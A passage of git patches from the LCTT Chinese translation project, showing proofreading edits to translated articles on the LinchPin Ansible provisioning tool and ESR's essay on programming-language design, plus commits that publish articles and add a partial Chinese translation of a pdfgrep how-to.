EC2、Google Cloud 上和 LinchPin 的更多详细情况,可以去看[示例][18]。 -### 库存(Inventory)生成 +#### 库存inventory生成 -作为上面提到的 PinFile 的一部分,可以指定一个 **layout**。如果这个文件被指定,并且放在一个正确的位置上,一个用于提供资源的 Ansible 的静态库存(inventory)文件将被自动生成: +作为上面提到的 PinFile 的一部分,可以指定一个 `layout`。如果这个文件被指定,并且放在一个正确的位置上,就会为配给的资源自动生成一个用于 Ansible 的静态库存inventory文件: ``` --- @@ -174,7 +164,7 @@ inventory_layout: - example ``` -当 **linchpin up** 运行完成,资源文件将提供一个很有用的详细信息。特别是,插入到静态库存(inventory)的 IP 地址或主机名: +当 `linchpin up` 运行完成,资源文件将提供一个很有用的详细信息。特别是,插入到静态库存的 IP 地址或主机名: ``` [example] @@ -188,13 +178,13 @@ web-1.example.net hostname=web-1.example.net web-0.example.net hostname=web-0.example.net ``` -### 卸载 (linchpin destroy) +#### 卸载 (`linchpin destroy`) -LinchPin 也可以执行一个资源卸载。一个卸载动作一般认为资源是已经配置好的;然而,因为 Ansible 是幂等的(idempotent),**linchpin destroy** 将仅去检查确认资源是启用的。如果这个资源已经是启用的,它将去卸载它。 +LinchPin 也可以执行资源卸载。卸载动作一般认为该资源是已经配给好的;然而,因为 Ansible 是幂等的idempotent,`linchpin destroy` 将仅检查确认该资源是启用的。如果这个资源已经是启用的,它将去卸载它。 -命令 **linchpin destroy** 也将使用资源和/或拓扑文件去决定合适的卸载过程。 +命令 `linchpin destroy` 也将使用资源和/或拓扑文件去决定合适的卸载过程。 -**dummy** Ansible 角色不使用资源,卸载期间仅有拓扑: +Ansible `dummy` 角色不使用资源,卸载期间仅有拓扑: ``` $ linchpin destroy @@ -204,55 +194,46 @@ $ cat /tmp/dummy.hosts -- EMPTY FILE -- ``` -在暂时的资源上,卸载功能有一些限制,像网络、存储、等等。网络资源被用于多个云实例是可能的。在这种情况下,执行一个 **linchpin destroy** 不能卸载某些资源。这取决于每个供应商的实现。查看每个[供应商][19]的具体实现。 +针对暂时的资源,卸载功能有一些限制,像网络、存储、等等。网络资源可以被用于多个云实例。在这种情况下,执行一个 `linchpin destroy` 某些资源就不能卸载。这取决于每个供应商的实现。查看每个[供应商][19]的具体实现。 ### LinchPin 的 Python API -在 **linchpin** 命令行中实现的功能大多数已经被写成了 Python API。这个 API,虽然不完整,但它已经成为 LinchPin 工具的至关重要的组件。 +在 `linchpin` 命令行中实现的功能大多数都是用 Python API 写的。这个 API,虽然不完整,但它已经成为 LinchPin 工具的至关重要的组件。 这个 API 由下面的三个包组成: -* **linchpin** - -* **linchpin.cli** - -* **linchpin.api** - -这个命令行工具是基于 **linchpin** 包来管理的。它导入了 **linchpin.cli** 模块和类,它是 **linchpin.api** 的子类。它的目的是为了允许使用 **linchpin.api** 的 LinchPin 的可能的其它实现,比如像计划的 RESTful API。 +* `linchpin` +* `linchpin.cli` +* `linchpin.api` + +该命令行工具是基于 `linchpin` 包来管理的。它导入了 `linchpin.cli` 模块和类,该类是 `linchpin.api` 的子类。这样做的目的是为了允许使用 `linchpin.api` 来做其它的 LinchPin 实现,比如像计划中的 RESTful API。 更多信息,去查看 [Python API library documentation on Read the Docs][20]。 -### Hooks +### Hook -LinchPin 1.0 的其中一个大的变化是转向 hooks。hooks 的目标是在 **linchpin** 运行期间,允许配置使用外部资源。目前情况如下: +LinchPin 1.0 的其中一个大的变化是转向 hook。hook 的目标是在 `linchpin` 运行期间的特定状态下,允许配置使用更多外部资源。目前的状态有: -* **preup**: 在准备拓扑资源之前运行 +* `preup`: 在配给拓扑资源之前运行 +* `postup`: 在配给拓扑资源之后运行,并且生成可选的库存inventory +* `predestroy`: 卸载拓扑资源之前运行 +* `postdestroy`: 卸载拓扑资源之后运行 -* **postup**: 在准备拓扑资源之后运行,并且生成可选的库存(inventory) +在每种状态下,这些 hooks 允许运行外部脚本。存在几种类型的 hook,包括一个定制的叫做 _Action Managers_。这是一个内置的 Action Manager 的列表: -* **predestroy**: 卸载拓扑资源之前运行 +* `shell`: 允许任何的内联inline的 shell 命令,或者一个可运行的 shell 脚本 +* `python`: 运行一个 Python 脚本 +* `ansible`: 运行一个 Ansible playbook,允许传递一个 `vars_file` 和 `extra_vars` 作为 Python 字典 +* `nodejs`: 运行一个 Node.js 脚本 +* `ruby`: 运行一个 Ruby 脚本 -* **postdestroy**: 卸载拓扑资源之后运行 +hook 被绑定到一个特定的目标,并且每个目标使用时必须重新声明。将来,hook 将可能是全局的,然后它们在每个目标的 `hooks` 节下命名会更简单。 -在每种情况下,这些 hooks 允许去运行外部脚本。存在几种类型的 hooks,包括一个定制的叫做 _Action Managers_。这是一个内置的动作管理的列表: +#### 使用 hook -* **shell**: 允许任何的内联(inline)shell 命令,或者一个可运行的 shell 脚本 +hook 描述起来非常简单,但理解它们强大的功能却并不简单。这个特性的存在是为了给用户灵活提供那些 LinchPin 开发者所没有考虑到的功能。这个概念可能会带来 ping 一套系统的简单方式,举个实例,比如在运行另一个 hook 之前。 -* **python**: 运行一个 Python 脚本 - -* **ansible**: 运行一个 Ansible playbook,允许通过一个 **vars_file** 和 **extra_vars** 表示为一个 Python 字典 - -* **nodejs**: 运行一个 Node.js 脚本 - -* **ruby**: 运行一个 Ruby 脚本 - -一个 hook 是绑定到一个特定的目标,并且每个目标使用时必须重新声明。将来,hooks 将可能是全局的,然后它们在每个目标的 **hooks** 节更简单地进行命名。 - -### 使用 hooks - -描述 hooks 是非常简单的,理解它们强大的功能却并不简单。这个特性的存在是为了给用户提供灵活的功能,而这些功能开发着可能并不会去考虑。对于实例,在运行其它的 hook 之前,这个概念可能会带来一个简单的方式去 ping 一套系统。 - -更仔细地去研究  _工作空间_ ,你可能会注意到 **hooks** 目录,让我们看一下这个目录的结构: +更仔细地去研究 _工作空间_ ,你可能会注意到 `hooks` 目录,让我们看一下这个目录的结构: ``` $ tree hooks/ @@ -266,7 +247,7 @@ hooks/    └── setup_db.sh ``` -在任何情况下,hooks 都可以在 **PinFile** 中使用,展示如下: +在任何情况下,hook 都可以用在 `PinFile` 中,展示如下: ``` --- @@ -286,15 +267,15 @@ dummy1: - init_db.sh ``` -那是基本概念,这里有三个 postup 动作去完成。Hooks 是从上到下运行的,因此,Ansible **ping** 任务将首先运行,紧接着是两个 shell 任务, **setup_db.sh** 和 **init_db.sh**。假设 hooks 运行成功。将发生一个系统的 ping,然后,一个数据库被安装和初始化。 +基本概念是有三个 postup 动作要完成。Hook 是从上到下运行的,因此,Ansible `ping` 任务将首先运行,紧接着是两个 shell 任务, `setup_db.sh` 和 `init_db.sh`。假设 hook 运行成功。将发生一个系统的 ping,然后,一个数据库被安装和初始化。 ### 认证的驱动程序 -在 LinchPin 的最初设计中,开发者决定去在 Ansible playbooks 中管理认证;然而,移到更多的 API 和命令行驱动的工具后,意味着认证将被置于 playbooks 库之外,并且还可以根据需要去传递认证值。 +在 LinchPin 的最初设计中,开发者决定在 Ansible playbooks 中管理认证;然而,逐渐有更多的 API 和命令行驱动的工具后,意味着认证将被置于 playbooks 库之外,并且还可以根据需要去传递认证值。 -### 配置 +#### 配置 -让用户使用驱动程序提供的认证方法去完成这个任务。对于实例,如果对于 OpenStack 调用的拓扑,标准方法是可以使用一个 yaml 文件,或者类似于 **OS_** 前缀的环境变量。一个 clouds.yaml 文件是一个 profile 文件的组成部分,它有一个 **auth** 节: +让用户使用驱动程序提供的认证方法去完成这个任务。举个实例,如果对于 OpenStack 调用的拓扑,标准方法是使用一个 yaml 文件,或者类似于 `OS_` 前缀的环境变量。`clouds.yaml` 文件是一个 profile 文件的组成部分,它有一个 `auth` 节: ``` clouds: @@ -308,7 +289,7 @@ clouds: 更多详细信息在 [OpenStack documentation][21]。 -这个 clouds.yaml 或者在位于 **default_credentials_path** (比如,~/.config/linchpin)中和拓扑中引用的任何其它认证文件: +这个 `clouds.yaml` 或者任何其它认证文件位于 `default_credentials_path` (比如,`~/.config/linchpin`)中,并在拓扑中引用: ``` --- @@ -332,11 +313,11 @@ resource_groups: profile: default ``` -**default_credentials_path** 可以通过修改 **linchpin.conf** 被改变。 +`default_credentials_path` 可以通过修改 `linchpin.conf` 改变。 -拓扑在底部包含一个新的 **credentials** 节。使用 **openstack**、**ec2**、和 **gcloud** 模块,也可以去指定类似的凭据。认证驱动程序将查看给定的  _名为_ **clouds.yaml** 的文件,并搜索名为 **default** 的 _配置_。 +拓扑在底部包含一个新的 `credentials` 节。使用 `openstack`、`ec2`、和 `gcloud` 模块,也可以去指定类似的凭据。认证驱动程序将查看给定的名为 `clouds.yaml` 的文件,并搜索名为 `default` 的 _配置_。 -假设认证被找到并被加载,准备将正常继续。 +假设认证被找到并被加载,配给将正常继续。 ### 简化 @@ -348,7 +329,7 @@ resource_groups: 在过去的一年里,社区成员已经从 2 位核心开发者增加到大约 10 位贡献者。更多的人持续参与到项目中。如果你对 LinchPin 感兴趣,可以给我们写信、在 GitHub 上提问,加入 IRC,或者给我们发邮件。 - _这篇文章是基于 Clint Savage 在 OpenWest 上的演讲 [Introducing LinchPin: Hybrid cloud provisioning using Ansible][7] 整理的。[OpenWest][8] 将在 2017 年 7 月 12-15 日在盐城湖市举行。_ +_这篇文章是基于 Clint Savage 在 OpenWest 上的演讲 [Introducing LinchPin: Hybrid cloud provisioning using Ansible][7] 整理的。[OpenWest][8] 将在 2017 年 7 月 12-15 日在盐城湖市举行。_ -------------------------------------------------------------------------------- @@ -362,7 +343,7 @@ via: https://opensource.com/article/17/6/linchpin 作者:[Clint Savage][a] 译者:[qhwdw](https://github.com/qhwdw) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 7beb122d45c7679d1a7256eb71de986ac7cfa5ef Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 21 Dec 2017 22:47:36 +0800 Subject: [PATCH 0746/1627] PUB:20170630 LinchPin A simplified cloud orchestration tool using Ansible.md @qhwdw https://linux.cn/article-9161-1.html --- ...inchPin A simplified cloud orchestration tool using Ansible.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20170630 LinchPin A simplified cloud orchestration tool using Ansible.md (100%) diff --git a/translated/tech/20170630 LinchPin A simplified cloud orchestration tool using Ansible.md b/published/20170630 LinchPin A simplified cloud orchestration tool using Ansible.md similarity index 100% rename from translated/tech/20170630 LinchPin A simplified cloud orchestration tool using Ansible.md rename to published/20170630 LinchPin A simplified cloud orchestration tool using Ansible.md From f85145dc93e9307da88f249ccaef491b77e864d4 Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 21 Dec 2017 23:14:27 +0800 Subject: [PATCH 0747/1627] PUB:20171118 Language engineering for great justice.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @Valoniakim 恭喜你完成了第一篇翻译贡献。也要感谢 @yunfengHe 的辛苦校对。文章发布地址:https://linux.cn/article-9162-1.html 你的 LCTT 专页地址:https://linux.cn/lctt/Valoniakim --- ...118 Language engineering for great justice.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) rename {translated/tech => published}/20171118 Language engineering for great justice.md (72%) diff --git a/translated/tech/20171118 Language engineering for great justice.md b/published/20171118 Language engineering for great justice.md similarity index 72% rename from translated/tech/20171118 Language engineering for great justice.md rename to published/20171118 Language engineering for great justice.md index 2da49da481..3ae564dba3 100644 --- a/translated/tech/20171118 Language engineering for great justice.md +++ b/published/20171118 Language engineering for great justice.md @@ -3,7 +3,7 @@ ESR:程序语言设计的要诣和真谛 当你真正掌握了整体化的工程设计思维时,你就会发现高屋建瓴的工程设计已经远远超越了技术优化的层面。我们的每一件创造都催生于人类活动的大背景下,被这种人类活动赋予了广泛的经济学意义、社会学意义,甚至于具有了奥地利经济学家所称的“人类行为学意义praxeology”。而这种人类行为学意义则是明确的人类行为所能达到的最高层次。 -对我来说这并不只是一种抽象的理论。当我在撰写关于开源项目开发的文章时,文章的内容正是关于人类行为学的 - 这些文章并不涉及哪个具体的软件技术或者话题,而是在讨论科技所服务的人类行为。从人类行为学角度对科技进行更深入的理解,可以帮助我们重塑科技,并且提升我们的生产力和成就感。这种提升并不总是因为我们有了更新的工具,而更多的是因为我们改变了使用现有工具的思路,提升了我们对这些工具的驾驭能力。 +对我来说这并不只是一种抽象的理论。当我在撰写关于开源项目开发的文章时,文章的内容正是关于人类行为学的 —— 这些文章并不涉及哪个具体的软件技术或者话题,而是在讨论科技所服务的人类行为。从人类行为学角度对科技进行更深入的理解,可以帮助我们重塑科技,并且提升我们的生产力和成就感。这种提升并不总是因为我们有了更新的工具,而更多的是因为我们改变了使用现有工具的思路,提升了我们对这些工具的驾驭能力。 在这个思路之下,我的随笔文章的第三篇中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统级别编程的新时代的到来。在这里,我会把我的统观见解总结成更具体的、更实用的对计算机语言设计的分析。例如总结出为什么一些语言会成功,另一些语言会失败。 @@ -13,31 +13,31 @@ ESR:程序语言设计的要诣和真谛 所谓的“远”、“近”之分,是指随着硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据这些因素的变化曲线所做出的判断。近景问题是编程人员眼下看到的问题,远景问题则是指可预见的,但未必会很快到来的一系列情况。针对近景问题的解决方案可以被很快部署下去,且能够在短期内非常有效,但随着情况的变化和时间的推移,这种方案可能很快就不适用了。而远景的解决方案可能因为其自身的复杂和超前性而夭折,或是因其代价过高无法被接受和采纳。 -在计算机刚刚面世的时候, FORTRAN 就是一个近景设计方案, LISP 语言的设计则是针对远景问题; 汇编语言多是近景设计方案,很好的阐明了这类设计很适用于非通用语言,同样的例子还包括 ROFF 标记语言。PHP 和 Javascript 则是我们后来看到的采用了近景设计思维的语言。那么后来的远景设计方案有哪些例子呢? Oberon、Ocaml、ML、XML-Docbook 都是它的例子。学术研究中设计出的语言多倾向于远景设计,因为在学术研究领域,原创性以及大胆的假设与想法是很重要的。这和学术研究的动机以及其奖励机制很有关系(值得注意的是,在学术研究中,倾向于远景设计的本源动机并非出于技术方面的原因,而是出自于人类行为,即标新立异才能在学术上有成绩)。学术研究中设计出的编程语言是注定会失败的; 因为学术研究的产物常常有高昂的转入成本,无人问津的设计。这类语言也因为在社区中不够流行而不能得到主流的采纳,具有孤立性,且常常被搁置成为半成品。(如上所述的问题正是对 LISP 历史的精辟总结,而且我是以一个对 LISP 语言有深入研究,并深深喜爱它的使用者的身份来评价 LISP 的)。 +在计算机刚刚面世的时候, FORTRAN 就是一个近景设计方案, LISP 语言的设计则是针对远景问题;汇编语言多是近景设计方案,很好的阐明了这类设计很适用于非通用语言,同样的例子还包括 ROFF 标记语言。PHP 和 Javascript 则是我们后来看到的采用了近景设计思维的语言。那么后来的远景设计方案有哪些例子呢? Oberon、Ocaml、ML、XML-Docbook 都是它的例子。学术研究中设计出的语言多倾向于远景设计,因为在学术研究领域,原创性以及大胆的假设与想法是很重要的。这和学术研究的动机以及其奖励机制很有关系(值得注意的是,在学术研究中,倾向于远景设计的本源动机并非出于技术方面的原因,而是出自于人类行为,即标新立异才能在学术上有成绩)。学术研究中设计出的编程语言是注定会失败的;因为学术研究的产物常常有高昂的转入成本,无人问津的设计。这类语言也因为在社区中不够流行而不能得到主流的采纳,具有孤立性,且常常被搁置成为半成品。(如上所述的问题正是对 LISP 历史的精辟总结,而且我是以一个对 LISP 语言有深入研究,并深深喜爱它的使用者的身份来评价 LISP 的)。 -一些近景设计的失败案例则更加惨不忍睹。对这些案例来说,我们能够期待的最好的结果就是这种语言可以消亡的相对体面一些,被一种新的语言设计取而代之。如果这些近景设计导向的语言没有死亡而是一直被沿用下去(通常是因为转化成本过高),那么我们则会看到不断有新的特性和功能在这些语言原来的基础之上堆积起来,以保持他们的可用性和有效性。直到这种堆积把这些语言变得越来越复杂,变的危若累卵且不可理喻。是的,我说的就是 C++ 。当然, 还有 Javascript. Perl 也不例外,尽管它的设计者 Larry Walls 有不错的设计品味,避免了很多问题,让这种语言得以存活了很多年。但也正是因为 Larry Walls 的好品味,让他在最终对 Perl 的固有问题忍无可忍之后发布了全新的 Perl 6。 +一些近景设计的失败案例则更加惨不忍睹。对这些案例来说,我们能够期待的最好的结果就是这种语言可以消亡的相对体面一些,被一种新的语言设计取而代之。如果这些近景设计导向的语言没有死亡而是一直被沿用下去(通常是因为转化成本过高),那么我们则会看到不断有新的特性和功能在这些语言原来的基础之上堆积起来,以保持它们的可用性和有效性。直到这种堆积把这些语言变得越来越复杂,变的危若累卵且不可理喻。是的,我说的就是 C++ 。当然, 还有 Javascript。Perl 也不例外,尽管它的设计者 Larry Walls 有不错的设计品味,避免了很多问题,让这种语言得以存活了很多年。但也正是因为 Larry Walls 的好品味,让他在最终对 Perl 的固有问题忍无可忍之后发布了全新的 Perl 6。 从这种角度去思考程序语言,我们则可以把语言设计中需要侧重的目标重新归纳为两部分: (1)以时间的远近为轴,在远景设计和近景设计之间选取一个符合预期的最佳平衡点;(2)降低由一种或多种语言转化为这种新语言的转入成本,这样就可以更好地吸纳其它语言的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 -在整个计算机发展史中,没有谁能比 C 语言 在选择远景和近景设计的平衡点的时候做的更完美。事实胜于雄辩,作为一种实用的主流语言,C 语言有着很长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 +在整个计算机发展史中,没有谁能比 C 语言在选择远景和近景设计的平衡点的时候做的更完美。事实胜于雄辩,作为一种实用的主流语言,C 语言有着很长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来 C 语言的终结仍旧不会到来。 当然,你可以把 C 语言的持久存在归功于文化惰性,但那是对“文化惰性”这个词的曲解,C 语言一直得以延续的真正原因是因为目前还没有人能提供另一种足够好的语言,可以抵消取代 C 语言所需要的转化成本! -相反的,C 语言低廉的内向转化成本(转入成本)并未引起大家应有的重视,C 语言几乎是唯一的一个极其多样和强大的编程工具,以至于从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN、Pascal 、汇编语言和 LISP 的编程习惯。在一九八零年代我就注意到,我常常可以根据一个 C 语言新人的编码风格判断出他之前在使用什么语言,这也从另一方面证明了 C 语言可以轻松的被其它语言的使用者所接受,并吸引他们加入进来。 +相反的,C 语言低廉的内向转化成本inward transition costs(转入成本)并未引起大家应有的重视,C 语言几乎是唯一的一个极其多样和强大的编程工具,以至于从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN、Pascal、汇编语言和 LISP 的编程习惯。在一九八零年代我就注意到,我常常可以根据一个 C 语言新人的编码风格判断出他之前在使用什么语言,这也从另一方面证明了 C 语言可以轻松的被其它语言的使用者所接受,并吸引他们加入进来。 C++ 语言同样胜在它低廉的转化成本。很快,大部分新兴的语言为了降低自身的转入成本,都纷纷参考了 C 语言的语法。值得注意的是这给未来的语言设计带来了一种影响:即新语言的设计都在尽可能的向 C 的语法靠拢,以便这种新语言可以有很低的内向转化成本(转入成本),使其他语言的使用者可以欣然接受并使用这种新语言。 -另一种降低转入成本的方法则是把一种编程语言设计的极其简单并容易入手,让那些即使是没有编程经验的人都可以轻松学会。但做到这一点并非易事。我认为只有一种语言 - Python - 成功的做到了这一点,即通过易用的设计来降低内向转化成本。对这种程序语言的设计思路我在这里一带而过,因为我并不认为一种系统级别的语言可以被设计的像 Python 一样傻瓜易用,当然我很希望我的这个论断是错的。 +另一种降低转入成本的方法则是把一种编程语言设计的极其简单并容易入手,让那些即使是没有编程经验的人都可以轻松学会。但做到这一点并非易事。我认为只有一种语言 —— Python —— 成功的做到了这一点,即通过易用的设计来降低内向转化成本。对这种程序语言的设计思路我在这里一带而过,因为我并不认为一种系统级别的语言可以被设计的像 Python 一样傻瓜易用,当然我很希望我的这个论断是错的。 而今我们已经来到 2017 年末尾,你一定猜测我接下来会向那些 Go 语言的鼓吹者一样对 Go 大加赞赏一番,然后激怒那些对 Go 不厌其烦的人群。但其实我的观点恰恰相反,我认为 Go 本身很有可能在许多方面遭遇失败。Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出某些方面的改变了,Go 团队也无动于衷,这是个大问题。目前,Go 语言的 GC 延迟问题以及用以平衡延迟而牺牲掉的吞吐量,都可能会严重制约这种语言的适用范围。 即便如此,在 Go 的设计中还是蕴含了一个让我颇为认同的远大战略目标。想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。正如我之前提到的,这个问题就是,随着软件工程项目和系统的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理故障一直是导致系统崩溃和安全漏洞的主要元凶。 -我们现在已经认清,一种语言要想取代 C 语言,它的设计就必须遵循两个十分重要准则:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。从人类行为学的角度来纵观编程语言的历史,我们不难发现,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那设计者所做的其他部分做得再好都不算数。相反的,如果一种 C 的替代语言把转入成本过高这个问题解决地很好,即使它在其他部分做的不是最好的,人们也不会对这种语言吹毛求疵。 +我们现在已经认清,一种语言要想取代 C 语言,它的设计就必须遵循两个十分重要准则:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。从人类行为学的角度来纵观编程语言的历史,我们不难发现,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那设计者所做的其它部分做得再好都不算数。相反的,如果一种 C 的替代语言把转入成本过高这个问题解决地很好,即使它在其他部分做的不是最好的,人们也不会对这种语言吹毛求疵。 而 Go 正是遵循了上述两点设计思路,虽然这个思路并不是一种完美无瑕的设计理论,也有其局限性。比如,目前 GC 延迟的问题就限制了 Go 的推广。但是 Go 目前选择了照搬 Unix 下 C 语言的传染战略,把其自身设计成一种易于转入,便于传播的语言。这样它的广泛和快速的传播就会使其迅速占领市场,从而打败那些针对远景设计的看起来更好的语言。 -当然,我所指的这个远景设计方案就是 Rust。而 Rust 的自身定位也正是一种远景和长期的 C 语言替代方案。我曾经在之前的一些文章中解释过我为什么认为 Rust 还没有做好和 Go 展开竞争的准备。TIBOE 和 PYPL 的语言评价指数榜也很好的证明了我的对于 Rust 的这个观点。在 TIBOE 上 Rust 从来没有进过前 20 名。而在 TIBOE 和 PYPL 两个指数榜上, Rust 都要比 Go 的表现差很多。 +没错,我所指的这个远景设计方案就是 Rust。而 Rust 的自身定位也正是一种远景和长期的 C 语言替代方案。我曾经在之前的一些文章中解释过我为什么认为 Rust 还没有做好和 Go 展开竞争的准备。TIBOE 和 PYPL 的语言评价指数榜也很好的证明了我的对于 Rust 的这个观点。在 TIBOE 上 Rust 从来没有进过前 20 名。而在 TIBOE 和 PYPL 两个指数榜上, Rust 都要比 Go 的表现差很多。 五年后的 Rust 会发展的怎样还未可知。但如果 Rust 社区的开发人员对这种语言的设计抱着认真投入的态度,并愿意倾听,那么我建议他们要特别重视转入成本的问题。以我个人经历来说,目前由 C 语言转入 Rust 语言的壁垒很高,使人望而却步。如果 Corrode 之类的 Code-lifting 工具只是把 C 语言映射为不安全的 Rust 语言,那么 Corrode 这类工具也是不能解决这种转入壁垒的。或者如果有更简单的方法能够自动注释代码的所有权或生命周期,那么编译器就能把 C 代码直接映射到 Rust,人们也不再需要 Corrode 这一类工具了。目前我还不知道这个问题要如何解决,但我觉得 Rust 社区最好能够找到一种解决方案来代替 Corrode 和其同类工具。 From 175ad47faeed5a14fb4f3b7680f20c25a838771f Mon Sep 17 00:00:00 2001 From: geekpi Date: Fri, 22 Dec 2017 09:00:28 +0800 Subject: [PATCH 0748/1627] translated --- ...DF Files from the Terminal with pdfgrep.md | 65 ------------------- ...- Learn to install TOR network on Linux.md | 2 + ...DF Files from the Terminal with pdfgrep.md | 64 ++++++++++++++++++ 3 files changed, 66 insertions(+), 65 deletions(-) delete mode 100644 sources/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md create mode 100644 translated/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md diff --git a/sources/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md b/sources/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md deleted file mode 100644 index 55eb9e369c..0000000000 --- a/sources/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md +++ /dev/null @@ -1,65 +0,0 @@ -translating---geekpi - -How to Search PDF Files from the Terminal with pdfgrep -====== -Command line utilities such as [grep][1] and [ack-grep][2] are great for searching plain-text files for patterns matching a specified [regular expression][3]. But have you ever tried using these utilities to search for patterns in a PDF file? Well, don't! You will not get any result as these tools cannot read PDF files; they only read plain-text files. - -[pdfgrep][4], as the name suggests, is a small command line utility that makes it possible to search for text in a PDF file without opening the file. It is insanely fast - faster than the search provided by virtually all PDF document viewers. A great distinction between grep and pdfgrep is that pdfgrep operates on pages, whereas grep operates on lines. It also prints a single line multiple times if more than one match is found on that line. Let's look at how exactly to use the tool. - -For Ubuntu and other Linux distros based on Ubuntu, it is pretty simple: -``` -sudo apt install pdfgrep -``` - -For other distros, just provide `pdfgrep` as input for the [package manager][5], and that should get it installed. You can also check out the project's [GitLab page][6], in case you want to play around with the code. - -Now that you have the tool installed, let's go for a test run. pdfgrep command takes this format: -``` -pdfgrep [OPTION...] PATTERN [FILE...] -``` - - **OPTION** is a list of extra attributes to give the command such as `-i` or `--ignore-case`, which both ignore the case distinction between the regular pattern specified and the once matching it from the file. - - **PATTERN** is just an extended regular expression. - - **FILE** is just the name of the file, if it is in the same working directory, or the path to the file. - -I ran the command on Python 3.6 official documentation. The following image is the result. - -![pdfgrep search][7] - -![pdfgrep search][7] - -The red highlights indicate all the places the word "queue" was encountered. Passing `-i` as option to the command included matches of the word "Queue." Remember, the case does not matter when `-i` is passed as an option. - -pdfgrep has quite a number of interesting options to use. However, I'll cover only a few here. - - * `-c` or `--count`: this suppresses the normal output of matches. Instead of displaying the long output of the matches, it only displays a value representing the number of times the word was encountered in the file - * `-p` or `--page-count`: this option prints out the page numbers of matches and the number of occurrences of the pattern on the page - * `-m` or `--max-count` [number]: specifies the maximum number of matches. That means when the number of matches is reached, the command stops reading the file. - - - -The full list of supported options can be found in the man pages or in the pdfgrep online [documenation][8]. Don't forget pdfgrep can search multiple files at the same time, in case you're working with some bulk files. The default match highlight color can be changed by altering the GREP_COLORS environment variable. - -The next time you think of opening up a PDF file to search for anything. think of using pdfgrep. The tool comes in handy and will save you time. - --------------------------------------------------------------------------------- - -via: https://www.maketecheasier.com/search-pdf-files-pdfgrep/ - -作者:[Bruno Edoh][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.maketecheasier.com -[1] https://www.maketecheasier.com/what-is-grep-and-uses/ -[2] https://www.maketecheasier.com/ack-a-better-grep/ -[3] https://www.maketecheasier.com/the-beginner-guide-to-regular-expressions/ -[4] https://pdfgrep.org/ -[5] https://www.maketecheasier.com/install-software-in-various-linux-distros/ -[6] https://gitlab.com/pdfgrep/pdfgrep -[7] https://www.maketecheasier.com/assets/uploads/2017/11/pdfgrep-screenshot.png (pdfgrep search) -[8] https://pdfgrep.org/doc.html diff --git a/sources/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md b/sources/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md index f31c2d2202..a47f00ef75 100644 --- a/sources/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md +++ b/sources/tech/20171219 Surf anonymously- Learn to install TOR network on Linux.md @@ -1,3 +1,5 @@ +translating---geekpi + Surf anonymously: Learn to install TOR network on Linux ====== Tor Network is an anonymous network to secure your internet & privacy. Tor network is a group of volunteer operated servers. Tor protects internet communication by bouncing it around a distributed network of relay system run by volunteers. This prevents us from people snooping the internet, they can't learn what site we visit or where is the user physically & it also allows us to use blocked websites. diff --git a/translated/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md b/translated/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md new file mode 100644 index 0000000000..75aae3b97e --- /dev/null +++ b/translated/tech/20171212 How to Search PDF Files from the Terminal with pdfgrep.md @@ -0,0 +1,64 @@ +如何使用 pdfgrep 从终端搜索 PDF 文件 +====== +诸如 [grep][1] 和 [ack-grep][2] 之类的命令行工具对于搜索匹配指定[正则表达式][3]的纯文本非常有用。但是你有没有试过使用这些工具在 PDF 中搜索模板?不要这么做!由于这些工具无法读取PDF文件,因此你不会得到任何结果。他们只能读取纯文本文件。 + +顾名思义,[pdfgrep][4] 是一个小的命令行程序,可以在不打开文件的情况下搜索 PDF 中的文本。它非常快速 - 比几乎所有 PDF 浏览器提供的搜索更快。grep 和 pdfgrep 的区别在于 pdfgrep 对页进行操作,而 grep 对行操作。grep 如果在一行上找到多个匹配项,它也会多次打印单行。让我们看看如何使用该工具。 + +对于 Ubuntu 和其他基于 Ubuntu 的 Linux 发行版来说,这非常简单: +``` +sudo apt install pdfgrep +``` + +对于其他发行版,只要将 `pdfgrep` 作为[包管理器][5]的输入,它就应该能够安装。万一你想浏览代码,你也可以查看项目的[ GitLab 页面][6]。 + +现在你已经安装了这个工具,让我们去测试一下。pdfgrep 命令采用以下格式: +``` +pdfgrep [OPTION...] PATTERN [FILE...] +``` + + **OPTION** 是一个额外的属性列表,给出诸如 `-i` 或 `--ignore-case` 这样的命令,这两者都会忽略匹配正则中的大小写。 + + **PATTERN** 是一个扩展的正则表达式。 + + **FILE** 